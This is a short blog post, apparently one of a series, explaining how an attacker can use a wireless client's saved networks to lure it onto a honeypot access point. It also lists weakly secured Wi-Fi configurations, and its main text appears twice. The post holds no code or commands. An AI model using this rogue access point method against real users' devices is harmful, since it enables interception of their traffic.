In the previous post, we saw how wifish-finder can find the security settings of SSIDs configured on our wireless client. So the natural question that comes into mind is......ok great! You have found the security settings on my SSID's in PNL, but how are you gonna use this information?? How does it make my client vulnerable??
The answer is: Your client is vulnerable if any of the SSIDs in your client is configured to connect to an open/weakly-secured AP. Any attacker can use this info to set up a "Honeypot AP" with same security settings and your client will connect to honeypot AP. Now, as your client has been associated to attacker's AP, layer 2 connection has already been made. If your client is configured to use dhcp address and attacker's AP is running dhcp server, wireless client will get an IP from the attacker's honeypot AP. At this time, attacker has layer-3 connection also with your client. I will not describe what an attacker do ,once he has layer 3 connection, in this post, but i will definitely put some more posts explaining what more can be done.
Access Points which can be considered as weakly-secured APs are:
1. Open Auth/No encryption
2.Open Auth/WEP encryption ( WEP key can easily be broken)
3.Shared Key Auth/WEP encryption (SKA just makes it easier to crack the key)
4.WPA/WPA2 -PSK (only dictionary attack is possible, so if you choose a strong key, its safe)
The most secure configuration as of now is WPA/WPA2 using 802.1x authentication. We will see in the coming posts that how a MITM attack is possible in some cases even if the client is configured with most secure configuration ( WPA/WPA2, 802.1x,PEAP).
The answer is: Your client is vulnerable if any of the SSIDs in your client is configured to connect to an open/weakly-secured AP. Any attacker can use this info to set up a "Honeypot AP" with same security settings and your client will connect to honeypot AP. Now, as your client has been associated to attacker's AP, layer 2 connection has already been made. If your client is configured to use dhcp address and attacker's AP is running dhcp server, wireless client will get an IP from the attacker's honeypot AP. At this time, attacker has layer-3 connection also with your client. I will not describe what an attacker do ,once he has layer 3 connection, in this post, but i will definitely put some more posts explaining what more can be done.
Access Points which can be considered as weakly-secured APs are:
1. Open Auth/No encryption
2.Open Auth/WEP encryption ( WEP key can easily be broken)
3.Shared Key Auth/WEP encryption (SKA just makes it easier to crack the key)
4.WPA/WPA2 -PSK (only dictionary attack is possible, so if you choose a strong key, its safe)
The most secure configuration as of now is WPA/WPA2 using 802.1x authentication. We will see in the coming posts that how a MITM attack is possible in some cases even if the client is configured with most secure configuration ( WPA/WPA2, 802.1x,PEAP).
No comments:
Post a Comment